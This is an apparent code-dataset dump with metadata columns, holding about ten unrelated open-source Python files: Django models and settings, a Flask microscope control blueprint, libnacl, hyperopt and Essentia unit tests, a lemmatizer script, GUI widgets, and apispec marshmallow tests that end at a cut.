repo_name
stringlengths 6
61
| path
stringlengths 4
230
| copies
stringlengths 1
3
| size
stringlengths 4
6
| text
stringlengths 1.01k
850k
| license
stringclasses 15
values | hash
int64 -9,220,477,234,079,998,000
9,219,060,020B
| line_mean
float64 11.6
96.6
| line_max
int64 32
939
| alpha_frac
float64 0.26
0.9
| autogenerated
bool 1
class | ratio
float64 1.62
6.1
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
unho/thesaurus_editor | thesaurus/models.py | 1 | 3604 | # -*- coding: UTF-8 -*-
#
# Copyright 2013 Leandro Regueiro
#
# This file is part of Thesaurus-editor.
#
# Thesaurus-editor is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# Thesaurus-editor is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# Thesaurus-editor. If not, see <http://www.gnu.org/licenses/>.
from django.db import models
#class Language(models.Model):
# iso_code = models.CharField(primary_key=True, max_length=10)
# name = models.CharField(max_length=50)
#
# def __unicode__(self):
# return u"%(iso_code)s" % self.iso_code
#class Thesaurus(models.Model):
# name = models.CharField(primary_key=True, max_length=50)
# language = models.ForeignKey(Language, null=True, on_delete=models.SET_NULL)
#
# def __unicode__(self):
# return self.name
class Word(models.Model):
word = models.CharField(primary_key=True, max_length=100)
finalized = models.BooleanField(default=False)
#thesaurus = models.ForeignKey(Thesaurus)
class Meta:
ordering = ['word']
#unique_together = ("word", "thesaurus")#TODO in case of uncommenting this, remove primary_key=True from word field.
def __unicode__(self):
return self.word
def _retrieve_list(self, relationship_type):
relationship_list = []
for relationship in self.relationship_set.filter(relationship_type=relationship_type):
#TODO export the relationship objects too, since it is neccessary for getting the part of speech.
#TODO export the relationship intermediary table, since it is neccessary for getting the notes.
relationship_list.append({"pk": relationship.pk,
"pos": relationship.pos,
"words": relationship.words.exclude(word=self)})
return relationship_list
def retrieve_synonyms(self):
return self._retrieve_list("S")
def retrieve_antonyms(self):
return self._retrieve_list("A")
def retrieve_hypernyms(self):
return self._retrieve_list("H")
#def next_word(self):
# return
class Relationship(models.Model):
RELATIONSHIP_CHOICES = (
(u'S', u'Synonym'),
(u'A', u'Antonym'),
(u'H', u'Hypernym'),
)
relationship_type = models.CharField(max_length=2, choices=RELATIONSHIP_CHOICES)
words = models.ManyToManyField(Word, through='WordsForRelationship')
pos = models.CharField(max_length=20, null=True, blank=True, default="")# Part of speech
def __unicode__(self):
return u"%(type)s: %(words)s" % {"type": self.get_relationship_type_display(), "words": self.words.all()}
class WordsForRelationship(models.Model):
relationship = models.ForeignKey(Relationship)
word = models.ForeignKey(Word)
note = models.CharField(max_length=20, null=True, blank=True, default="")# Like (generic word) or something like that
class Meta:
unique_together = ("relationship", "word")
def __unicode__(self):
return u"%(word)s --> %(relationship)s" % {"word": self.word, "relationship": self.relationship}
| gpl-3.0 | -741,755,615,329,156,500 | 35.40404 | 124 | 0.6601 | false | 3.754167 | false | false | false |
devalbo/mm_anywhere | mm_app_core.py | 1 | 4332 | """
mm_app_core.py
~~~~~~~~~~~~
This module supports accessing image acquisition functionality, similar to the
main Micro-Manager dialog.
:copyright: (c) 2012 by Albert Boehmler
:license: GNU Affero General Public License, see LICENSE for more details.
"""
import sys, os, time, thread
from flask import Blueprint, render_template, abort, url_for, redirect, request
from pylab import imsave, cm
import MMCorePy
from settings import mm_core as mmc
import settings
import configurations
import mm_util
mm_app_core = Blueprint('mm_app_core', __name__,
template_folder='templates')
@mm_app_core.route('/')
def index():
return render_template('acquisition.html',
mm_app_core=sys.modules[__name__],
configurations=configurations._get_configs_listing())
def get_allowed_binning_values():
return mmc.getAllowedPropertyValues(mmc.getCameraDevice(),
MMCorePy.g_Keyword_Binning)
def get_available_shutters():
return mmc.getLoadedDevicesOfType(MMCorePy.ShutterDevice)
@mm_app_core.route('/binning/')
def get_binning():
return mmc.getProperty(mmc.getCameraDevice(),
MMCorePy.g_Keyword_Binning)
@mm_app_core.route('/binning/', methods=['POST'])
def set_binning():
binning_value = int(request.form['binning'])
return _set_binning(binning_value)
@mm_app_core.route('/shutter/')
def get_shutter():
return mmc.getShutterDevice()
@mm_app_core.route('/exposure/')
def get_exposure():
return mmc.getExposure()
@mm_app_core.route('/exposure/', methods=['POST'])
def set_exposure():
exposure_value = float(request.form['exposure'])
return _set_exposure(exposure_value)
@mm_app_core.route('/auto-shutter/')
def get_auto_shutter():
return mmc.getAutoShutter()
@mm_app_core.route('/auto-shutter/', methods=['POST'])
def set_auto_shutter():
auto_shutter_value = mm_util.from_js_boolean(request.form['auto-shutter'])
return _set_auto_shutter(auto_shutter_value)
@mm_app_core.route('/open-shutter/')
def get_shutter_open():
return mmc.getShutterOpen()
@mm_app_core.route('/open-shutter/', methods=['POST'])
def set_shutter_open():
open_shutter_value = mm_util.from_js_boolean(request.form['open-shutter'])
return _set_shutter_open(open_shutter_value)
@mm_app_core.route('/active-shutter/')
def get_active_shutter():
return mmc.getShutter()
@mm_app_core.route('/active-shutter/', methods=['POST'])
def set_active_shutter():
active_shutter_value = str(request.form['active-shutter'])
return _set_active_shutter(active_shutter_value)
@mm_app_core.route('/snap-image/')
def snap_image():
image_name = _snap_image()
return render_template('snap-image.html',
img_url=url_for('acq.download_acquired_image',
image_name=image_name))
def _is_camera_available():
return None != mmc.getCameraDevice()
def _set_binning(binning_value):
if (_is_camera_available()):
mmc.setProperty(mmc.getCameraDevice(),
MMCorePy.g_Keyword_Binning,
binning_value)
return mmc.getProperty(mmc.getCameraDevice(),
MMCorePy.g_Keyword_Binning)
def _set_exposure(exposure_value):
mmc.setExposure(exposure_value)
return str(mmc.getExposure())
def _set_auto_shutter(auto_shutter_value):
mmc.setAutoShutter(auto_shutter_value)
return str(mmc.getAutoShutter())
def _set_shutter_open(shutter_open_value):
mmc.setShutterOpen(shutter_open_value);
return str(mmc.getShutterOpen())
def _set_active_shutter(active_shutter_value):
return mmc.setShutterDevice(active_shutter_value)
return mmc.getShutterDevice()
def _snap_image():
image_name = "acq-%s.png" % int(time.time() * 1000)
save_location = os.path.join(settings.MM_ANYWHERE_HOST_DATA_PATH,
image_name)
camera = ""
## thread.start_new_thread(_execute_snap_image, (camera, save_location))
## time.sleep(0.1)
_execute_snap_image(camera, save_location)
return image_name
def _execute_snap_image(camera, save_location):
mmc.snapImage()
mmc.waitForSystem()
img = mmc.getImage()
imsave(save_location, img, cmap = cm.gray)
| agpl-3.0 | -4,937,903,672,448,641,000 | 29.507042 | 80 | 0.660434 | false | 3.254696 | false | false | false |
saltstack/libnacl | tests/unit/test_raw_random.py | 1 | 3629 | """
Basic tests for randombytes_* functions
"""
import libnacl
import unittest
class TestRandomBytes(unittest.TestCase):
def test_randombytes_random(self):
self.assertIsInstance(libnacl.randombytes_random(), int)
def test_randombytes_uniform(self):
self.assertIsInstance(libnacl.randombytes_uniform(200), int)
freq = {libnacl.randombytes_uniform(256): 1 for _ in range(65536)}
self.assertEqual(256, len(freq))
self.assertTrue(all(freq.values()))
def test_randombytes(self):
'copied from libsodium default/randombytes.c'
data = libnacl.randombytes(65536)
freq = {x: 1 for x in data}
self.assertEqual(256, len(freq))
self.assertTrue(all(freq.values()))
def test_randombytes_buf_deterministic(self):
seed = libnacl.randombytes_buf(32)
seed2 = libnacl.randombytes_buf(32)
data = libnacl.randombytes_buf_deterministic(32, seed)
data2 = libnacl.randombytes_buf_deterministic(32, seed)
data3 = libnacl.randombytes_buf_deterministic(32, seed2)
self.assertEqual(32, len(data))
self.assertEqual(32, len(data))
self.assertEqual(32, len(data))
self.assertEqual(data, data2)
self.assertNotEqual(data, data3)
def test_crypto_kdf_keygen(self):
master_key = libnacl.crypto_kdf_keygen()
freq = {x: 1 for x in master_key}
self.assertEqual(32, len(master_key))
self.assertTrue(all(freq.values()))
def test_crypto_kdf_derive_from_key(self):
master_key = libnacl.crypto_kdf_keygen()
subkey = libnacl.crypto_kdf_derive_from_key(16, 1, "Examples", master_key)
subkey2 = libnacl.crypto_kdf_derive_from_key(16, 1, "Examples", master_key)
subkey3 = libnacl.crypto_kdf_derive_from_key(16, 2, "Examples", master_key)
self.assertEqual(16, len(subkey))
self.assertEqual(16, len(subkey2))
self.assertEqual(16, len(subkey3))
self.assertEqual(subkey, subkey2)
self.assertNotEqual(subkey, subkey3)
def test_crypto_kx_keypair(self):
pk, sk = libnacl.crypto_kx_keypair()
self.assertEqual(32, len(pk))
self.assertEqual(32, len(sk))
def test_crypto_kx_seed_keypair(self):
seed = libnacl.randombytes_buf(32)
seed2 = libnacl.randombytes_buf(32)
pk, sk = libnacl.crypto_kx_seed_keypair(seed)
pk2, sk2 = libnacl.crypto_kx_seed_keypair(seed)
pk3, sk3 = libnacl.crypto_kx_seed_keypair(seed2)
self.assertEqual(pk, pk2)
self.assertNotEqual(pk, pk3)
self.assertEqual(sk, sk2)
self.assertNotEqual(sk, sk3)
def test_crypto_kx_client_session_keys(self):
client_pk, client_sk = libnacl.crypto_kx_keypair()
server_pk, server_sk = libnacl.crypto_kx_keypair()
rx, tx, status = libnacl.crypto_kx_client_session_keys(client_pk, client_sk, server_pk)
rx2, tx2, status = libnacl.crypto_kx_client_session_keys(client_pk, client_sk, server_pk)
self.assertEqual(32, len(rx))
self.assertEqual(32, len(tx))
self.assertEqual(rx, rx2)
self.assertEqual(tx, tx2)
def test_crypto_kx_server_session_keys(self):
client_pk, client_sk = libnacl.crypto_kx_keypair()
server_pk, server_sk = libnacl.crypto_kx_keypair()
rx, tx, status = libnacl.crypto_kx_server_session_keys(client_pk, client_sk, server_pk)
rx2, tx2, status = libnacl.crypto_kx_server_session_keys(client_pk, client_sk, server_pk)
self.assertEqual(32, len(rx))
self.assertEqual(32, len(tx))
self.assertEqual(rx, rx2)
self.assertEqual(tx, tx2)
| apache-2.0 | 3,889,134,625,305,365,000 | 33.894231 | 95 | 0.659961 | false | 3.237288 | true | false | false |
pengutronix/aiohttp-json-rpc | examples/django3_example_project/example_project/settings.py | 1 | 3115 | """
Django settings for example_project project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '%sog7c%&7^pk5+v@4@2^+s$5r45wzkxe@^)9ki0ik#k+!sa8_&'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'example_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'example_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
| apache-2.0 | 6,363,014,849,474,257,000 | 24.958333 | 91 | 0.686035 | false | 3.5 | false | false | false |
mathkann/hyperopt | hyperopt/tests/test_criteria.py | 7 | 1917 | import numpy as np
import hyperopt.criteria as crit
def test_ei():
rng = np.random.RandomState(123)
for mean, var in [(0, 1), (-4, 9)]:
thresholds = np.arange(-5, 5, .25) * np.sqrt(var) + mean
v_n = [crit.EI_gaussian_empirical(mean, var, thresh, rng, 10000)
for thresh in thresholds]
v_a = [crit.EI_gaussian(mean, var, thresh)
for thresh in thresholds]
#import matplotlib.pyplot as plt
#plt.plot(thresholds, v_n)
#plt.plot(thresholds, v_a)
#plt.show()
if not np.allclose(v_n, v_a, atol=0.03, rtol=0.03):
for t, n, a in zip(thresholds, v_n, v_a):
print t, n, a, abs(n - a), abs(n - a) / (abs(n) + abs(a))
assert 0
#mean, var, thresh, v_n, v_a)
def test_log_ei():
for mean, var in [(0, 1), (-4, 9)]:
thresholds = np.arange(-5, 30, .25) * np.sqrt(var) + mean
ei = np.asarray(
[crit.EI_gaussian(mean, var, thresh)
for thresh in thresholds])
nlei = np.asarray(
[crit.logEI_gaussian(mean, var, thresh)
for thresh in thresholds])
naive = np.log(ei)
#import matplotlib.pyplot as plt
#plt.plot(thresholds, ei, label='ei')
#plt.plot(thresholds, nlei, label='nlei')
#plt.plot(thresholds, naive, label='naive')
#plt.legend()
#plt.show()
# -- assert that they match when the threshold isn't too high
assert np.allclose(nlei, naive)
def test_log_ei_range():
assert np.all(
np.isfinite(
[crit.logEI_gaussian(0, 1, thresh)
for thresh in [-500, 0, 50, 100, 500, 5000]]))
def test_ucb():
assert np.allclose(crit.UCB(0, 1, 1), 1)
assert np.allclose(crit.UCB(0, 1, 2), 2)
assert np.allclose(crit.UCB(0, 4, 1), 2)
assert np.allclose(crit.UCB(1, 4, 1), 3)
# -- flake8
| bsd-3-clause | -1,589,826,703,282,367,200 | 29.919355 | 73 | 0.542514 | false | 3.112013 | false | false | false |
WING-NUS/TESLA-S | lemma_format.py | 1 | 3183 | #!/usr/bin/env python
import sys
import re
from util import *
##
## reformat lemmatizer output from different lemmatizers
## output format: lemma1 lemma2 ... one sentence per line
##
if len(sys.argv) != 2:
print "usage: lemma_reformat.py [treetagger|freeling|morce|morph] < input > output"
sys.exit(-1)
if sys.argv[1] in "treetagger freeling morce morph".split():
tagger = sys.argv[1]
else:
print "Error: unknown lemmatizer: ", sys.argv[1]
sys.exit(-1)
# POS/lemma separator
sep = "_"
if tagger == 'morce':
for paragraph in paragraphs(sys.stdin, separator=lambda x:x.strip()=="<s>", includeEmpty=False):
if paragraph.startswith("<csts>"):
continue
for line in paragraph.split("\n"):
line = line.decode("utf8", "replace")
if not line.startswith("<f") or line.startswith("<d"):
continue
try:
re_word = re.search(">.*?<", line)
word = re_word.group(0)[1:-1]
re_pos = re.search("MDt.*?>.", line)
pos = re_pos.group(0)[-1]
re_lem = re.search("(<MDl.*?>)([^<]*)(<)", line)
lem = re_lem.group(2)
if lem.find("-") > 0:
lem = lem[:lem.find("-")]
if lem.find("_") > 0:
lem = lem[:lem.find("_")]
except:
print "Warning: no lemma found: %s" % line.encode("utf8", "replace")
# lowercase lemma
lem = lem.lower()
print "%s%s%s%s%s" % (word.encode("utf8", "replace"), sep, pos.encode("utf8", "replace"), sep, lem.encode("utf8")),
print""
elif tagger == 'morph':
while True:
line = sys.stdin.readline()
if line == '':
break
line = line.decode("utf8", "replace")
tokens = line.split()
if tokens == []:
continue
for token in tokens:
sep1 = token.find('_')
sep2 = token.find('_', sep1+1)
if sep2 < 0:
lem = token[:sep1].lower()
print "%s%s%s" % (token.encode("utf8", "replace"), sep, lem.encode("utf8", "replace")),
else:
word_pos= token[:sep2]
lem = token[sep2+1:].lower()
print "%s%s%s" % (word_pos.encode("utf8", "replace"), sep, lem.encode("utf8", "replace")),
print ""
sys.stdout.flush()
else:
for paragraph in paragraphs(sys.stdin, includeEmpty=False):
for line in paragraph.split("\n"):
line = line.decode("utf8", "replace")
tokens = line.split()
if len(tokens) < 3: # skip 'other' stuff like xml markup
continue
if tagger == 'treetagger':
word, pos, lem = tokens
if lem == "<unknown>":
lem = word
else: # tagger == "freeling"
word, lem, pos = tokens[:3]
# lowercase lemma
lem = lem.lower()
print "%s%s%s%s%s" % (word.encode("utf8", "replace"), sep, pos.encode("utf8", "replace"), sep, lem.encode("utf8")),
print""
| gpl-2.0 | -8,585,263,154,572,538,000 | 34.366667 | 127 | 0.49136 | false | 3.490132 | false | false | false |
arseneyr/essentia | test/src/unittest/standard/test_envelope.py | 1 | 2094 | #!/usr/bin/env python
# Copyright (C) 2006-2016 Music Technology Group - Universitat Pompeu Fabra
#
# This file is part of Essentia
#
# Essentia is free software: you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation (FSF), either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the Affero GNU General Public License
# version 3 along with this program. If not, see http://www.gnu.org/licenses/
from essentia_test import *
import numpy
class TestEnvelope(TestCase):
def testFile(self):
filename=join(testdata.audio_dir, 'generated', 'synthesised', 'sin_pattern_decreasing.wav')
audioLeft = MonoLoader(filename=filename, downmix='left', sampleRate=44100)()
envelope = Envelope(sampleRate=44100, attackTime=5, releaseTime=100)(audioLeft)
for x in envelope:
self.assertValidNumber(x)
def testEmpty(self):
self.assertEqualVector(Envelope()([]), [])
def testZero(self):
input = [0]*100000
envelope = Envelope(sampleRate=44100, attackTime=5, releaseTime=100)(input)
self.assertEqualVector(envelope, input)
def testOne(self):
input = [-0.5]
envelope = Envelope(sampleRate=44100, attackTime=0, releaseTime=100, applyRectification=True)(input)
self.assertEqual(envelope[0], -input[0])
def testInvalidParam(self):
self.assertConfigureFails(Envelope(), { 'sampleRate': 0 })
self.assertConfigureFails(Envelope(), { 'attackTime': -10 })
self.assertConfigureFails(Envelope(), { 'releaseTime': -10 })
suite = allTests(TestEnvelope)
if __name__ == '__main__':
TextTestRunner(verbosity=2).run(suite)
| agpl-3.0 | -8,136,286,983,662,147,000 | 36.072727 | 108 | 0.684814 | false | 3.766187 | true | false | false |
HarmonyEnterpriseSolutions/harmony-platform | src/gnue/forms/uidrivers/java/widgets/menuitem.py | 1 | 3754 | # GNU Enterprise Forms - wx 2.6 UI Driver - MenuItem widget
#
# Copyright 2001-2007 Free Software Foundation
#
# This file is part of GNU Enterprise
#
# GNU Enterprise is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either
# version 2, or (at your option) any later version.
#
# GNU Enterprise is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with program; see the file COPYING. If not,
# write to the Free Software Foundation, Inc., 59 Temple Place
# - Suite 330, Boston, MA 02111-1307, USA.
#
# $Id: menuitem.py,v 1.5 2011/07/01 20:08:23 oleg Exp $
from src.gnue.forms.uidrivers.java.widgets._base import UIWidget
from src.gnue.forms.uidrivers.java.widgets._remote import MenuItem
# =============================================================================
# Wrap an UI layer around a wxMenu widget
# =============================================================================
class UIMenuItem(UIWidget):
"""
Implements a menu item object.
"""
# -------------------------------------------------------------------------
# Create a menu item widget
# -------------------------------------------------------------------------
def _create_widget_(self, event):
"""
Creates a new MenuItem widget.
"""
if event.container:
# These are the relevant parameters
#hotkey = self._gfObject.hotkey
if self._gfObject.label is not None:
# it may be (table, tree) or frame
#uiWidget = self._gfObject.getActionSource().uiWidget
#if uiWidget._type == 'UIForm':
# actionSourceWidget = uiWidget.main_window
#else:
# actionSourceWidget = uiWidget.widget
#assert actionSourceWidget
#actionSourceWidget.Bind(wx.EVT_MENU, self.__on_menu, widget)
widget = MenuItem(self,
self._gfObject.label, # label
self._uiDriver.getStaticResourceWebPath(
self._gfObject._get_icon_file(size="16x16", format="png")
) or '', # icon file name
self._gfObject.action_off is not None, # is checkbox
)
event.container.uiAddMenu(widget)
else:
widget = None
event.container.uiAddSeparator()
self.widget = widget
# -------------------------------------------------------------------------
# Events
# -------------------------------------------------------------------------
def onMenu(self, remoteWidget):
self._gfObject._event_fire()
# -------------------------------------------------------------------------
# Check/uncheck menu item
# -------------------------------------------------------------------------
def _ui_switch_on_(self):
if self.widget is not None:
self.widget.uiCheck(True)
# -------------------------------------------------------------------------
def _ui_switch_off_(self):
if self.widget is not None:
self.widget.uiCheck(False)
# -------------------------------------------------------------------------
# Enable/disable menu item
# -------------------------------------------------------------------------
def _ui_enable_(self, enabled):
if self.widget is not None:
self.widget.uiEnable(enabled)
#def getId(self):
# return self.widget.GetId()
# =============================================================================
# Configuration data
# =============================================================================
configuration = {
'baseClass': UIMenuItem,
'provides' : 'GFMenuItem',
'container': False
}
| gpl-2.0 | -4,051,717,551,590,470,700 | 29.770492 | 79 | 0.514118 | false | 4.280502 | false | false | false |
arjclark/cylc | lib/cylc/gui/graph.py | 2 | 3139 | #!/usr/bin/env python
# THIS FILE IS PART OF THE CYLC SUITE ENGINE.
# Copyright (C) 2008-2018 NIWA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import gtk
from cylc.gui.gcapture import Gcapture
from cylc.gui.warning_dialog import warning_dialog
def graph_suite_popup(reg, cmd_help, defstartc, defstopc, graph_opts,
gcapture_windows, tmpdir, template_opts,
parent_window=None):
"""Popup a dialog to allow a user to configure their suite graphing."""
try:
import xdot
except ImportError as exc:
warning_dialog(str(exc) + "\nGraphing disabled.", parent_window).warn()
return False
window = gtk.Window()
window.set_border_width(5)
window.set_title("cylc graph " + reg)
window.set_transient_for(parent_window)
window.set_type_hint(gtk.gdk.WINDOW_TYPE_HINT_DIALOG)
vbox = gtk.VBox()
label = gtk.Label("[START]: ")
start_entry = gtk.Entry()
start_entry.set_max_length(14)
if defstartc:
start_entry.set_text(str(defstartc))
ic_hbox = gtk.HBox()
ic_hbox.pack_start(label)
ic_hbox.pack_start(start_entry, True)
vbox.pack_start(ic_hbox)
label = gtk.Label("[STOP]:")
stop_entry = gtk.Entry()
stop_entry.set_max_length(14)
if defstopc:
stop_entry.set_text(str(defstopc))
fc_hbox = gtk.HBox()
fc_hbox.pack_start(label)
fc_hbox.pack_start(stop_entry, True)
vbox.pack_start(fc_hbox, True)
cancel_button = gtk.Button("_Close")
cancel_button.connect("clicked", lambda x: window.destroy())
ok_button = gtk.Button("_Graph")
ok_button.connect("clicked", lambda w: graph_suite(
reg,
start_entry.get_text(),
stop_entry.get_text(),
graph_opts, gcapture_windows,
tmpdir, template_opts, parent_window))
help_button = gtk.Button("_Help")
help_button.connect("clicked", cmd_help, '', 'graph')
hbox = gtk.HBox()
hbox.pack_start(ok_button, False)
hbox.pack_end(cancel_button, False)
hbox.pack_end(help_button, False)
vbox.pack_start(hbox)
window.add(vbox)
window.show_all()
def graph_suite(reg, start, stop, graph_opts,
gcapture_windows, tmpdir, template_opts, window=None):
"""Launch the cylc graph command with some options."""
options = graph_opts
options += ' ' + reg + ' ' + start + ' ' + stop
command = "cylc graph " + template_opts + " " + options
foo = Gcapture(command, tmpdir)
gcapture_windows.append(foo)
foo.run()
return False
| gpl-3.0 | 4,249,888,790,959,960,000 | 32.042105 | 79 | 0.660083 | false | 3.46468 | false | false | false |
marshmallow-code/apispec | tests/test_ext_marshmallow.py | 1 | 47705 | import json
import pytest
from marshmallow.fields import Field, DateTime, Dict, String, Nested, List, TimeDelta
from marshmallow import Schema
from apispec import APISpec
from apispec.ext.marshmallow import MarshmallowPlugin
from apispec.ext.marshmallow import common
from apispec.exceptions import APISpecError
from .schemas import (
PetSchema,
AnalysisSchema,
RunSchema,
SelfReferencingSchema,
OrderedSchema,
PatternedObjectSchema,
DefaultValuesSchema,
AnalysisWithListSchema,
)
from .utils import get_schemas, get_parameters, get_responses, get_paths, build_ref
class TestDefinitionHelper:
@pytest.mark.parametrize("schema", [PetSchema, PetSchema()])
def test_can_use_schema_as_definition(self, spec, schema):
spec.components.schema("Pet", schema=schema)
definitions = get_schemas(spec)
props = definitions["Pet"]["properties"]
assert props["id"]["type"] == "integer"
assert props["name"]["type"] == "string"
def test_schema_helper_without_schema(self, spec):
spec.components.schema("Pet", {"properties": {"key": {"type": "integer"}}})
definitions = get_schemas(spec)
assert definitions["Pet"]["properties"] == {"key": {"type": "integer"}}
@pytest.mark.parametrize("schema", [AnalysisSchema, AnalysisSchema()])
def test_resolve_schema_dict_auto_reference(self, schema):
def resolver(schema):
schema_cls = common.resolve_schema_cls(schema)
return schema_cls.__name__
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
with pytest.raises(KeyError):
get_schemas(spec)
spec.components.schema("analysis", schema=schema)
spec.path(
"/test",
operations={
"get": {
"responses": {
"200": {"schema": build_ref(spec, "schema", "analysis")}
}
}
},
)
definitions = get_schemas(spec)
assert 3 == len(definitions)
assert "analysis" in definitions
assert "SampleSchema" in definitions
assert "RunSchema" in definitions
@pytest.mark.parametrize(
"schema", [AnalysisWithListSchema, AnalysisWithListSchema()]
)
def test_resolve_schema_dict_auto_reference_in_list(self, schema):
def resolver(schema):
schema_cls = common.resolve_schema_cls(schema)
return schema_cls.__name__
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
with pytest.raises(KeyError):
get_schemas(spec)
spec.components.schema("analysis", schema=schema)
spec.path(
"/test",
operations={
"get": {
"responses": {
"200": {"schema": build_ref(spec, "schema", "analysis")}
}
}
},
)
definitions = get_schemas(spec)
assert 3 == len(definitions)
assert "analysis" in definitions
assert "SampleSchema" in definitions
assert "RunSchema" in definitions
@pytest.mark.parametrize("schema", [AnalysisSchema, AnalysisSchema()])
def test_resolve_schema_dict_auto_reference_return_none(self, schema):
def resolver(schema):
return None
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
with pytest.raises(KeyError):
get_schemas(spec)
with pytest.raises(
APISpecError, match="Name resolver returned None for schema"
):
spec.components.schema("analysis", schema=schema)
@pytest.mark.parametrize("schema", [AnalysisSchema, AnalysisSchema()])
def test_warning_when_schema_added_twice(self, spec, schema):
spec.components.schema("Analysis", schema=schema)
with pytest.warns(UserWarning, match="has already been added to the spec"):
spec.components.schema("DuplicateAnalysis", schema=schema)
def test_schema_instances_with_different_modifiers_added(self, spec):
class MultiModifierSchema(Schema):
pet_unmodified = Nested(PetSchema)
pet_exclude = Nested(PetSchema, exclude=("name",))
spec.components.schema("Pet", schema=PetSchema())
spec.components.schema("Pet_Exclude", schema=PetSchema(exclude=("name",)))
spec.components.schema("MultiModifierSchema", schema=MultiModifierSchema)
definitions = get_schemas(spec)
pet_unmodified_ref = definitions["MultiModifierSchema"]["properties"][
"pet_unmodified"
]
assert pet_unmodified_ref == build_ref(spec, "schema", "Pet")
pet_exclude = definitions["MultiModifierSchema"]["properties"]["pet_exclude"]
assert pet_exclude == build_ref(spec, "schema", "Pet_Exclude")
def test_schema_instance_with_different_modifers_custom_resolver(self):
class MultiModifierSchema(Schema):
pet_unmodified = Nested(PetSchema)
pet_exclude = Nested(PetSchema(partial=True))
def resolver(schema):
schema_instance = common.resolve_schema_instance(schema)
prefix = "Partial-" if schema_instance.partial else ""
schema_cls = common.resolve_schema_cls(schema)
name = prefix + schema_cls.__name__
if name.endswith("Schema"):
return name[:-6] or name
return name
spec = APISpec(
title="Test Custom Resolver for Partial",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
with pytest.warns(None) as record:
spec.components.schema("NameClashSchema", schema=MultiModifierSchema)
assert len(record) == 0
def test_schema_with_clashing_names(self, spec):
class Pet(PetSchema):
another_field = String()
class NameClashSchema(Schema):
pet_1 = Nested(PetSchema)
pet_2 = Nested(Pet)
with pytest.warns(
UserWarning, match="Multiple schemas resolved to the name Pet"
):
spec.components.schema("NameClashSchema", schema=NameClashSchema)
definitions = get_schemas(spec)
assert "Pet" in definitions
assert "Pet1" in definitions
def test_resolve_nested_schema_many_true_resolver_return_none(self):
